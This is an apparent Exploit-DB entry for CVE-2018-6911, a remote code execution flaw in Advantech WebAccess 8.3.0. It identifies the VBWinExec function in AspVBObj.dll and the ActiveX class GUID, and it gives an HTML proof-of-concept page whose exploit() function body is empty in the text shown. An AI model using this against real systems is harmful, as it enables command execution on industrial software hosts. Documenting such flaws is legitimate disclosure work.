Advantech WebAccess 8.3.0 - Remote Code Execution

EDB-ID: 44031
Author: Nassim Asrir
Published: 2018-02-13
CVE: CVE-2018-6911
Type: Remote
Platform: Windows
Vulnerable App: N/A

Discovered by: Nassim Asrir

Contact: [email protected] /

CVE: CVE-2018-6911

Tested on: IE11 / Win10

Technical Details:

The VBWinExec function in Node\AspVBObj.dll in Advantech WebAccess 8.3.0 allows remote attackers to execute arbitrary OS commands via a single argument.

Vulnerable File: C:\WebAccess\Node\AspVBObj.dll

Vulnerable Function: VBWinExec

Vulnerable Class: Include

Class Include
GUID: {55F52D11-CEA5-4D6C-9912-2C8FA03275CE}
Number of Interfaces: 1
Default Interface: _Include
RegKey Safe for Script: False
RegkeySafe for Init: False
KillBitSet: False

The VBWinExec function take one parameter and the user/attacker will be able to control it to execute OS command.

Function VBWinExec (
ByRef command As String


<title>Advantech WebAccess Node8.3.0 "AspVBObj.dll" - Remote Code Execution</title>
<object id=rce classid="clsid:{55F52D11-CEA5-4D6C-9912-2C8FA03275CE}"></object>


function exploit()



<input language=JavaScript onclick=exploit() type=button value="Exploit-Me"><br>

Related Posts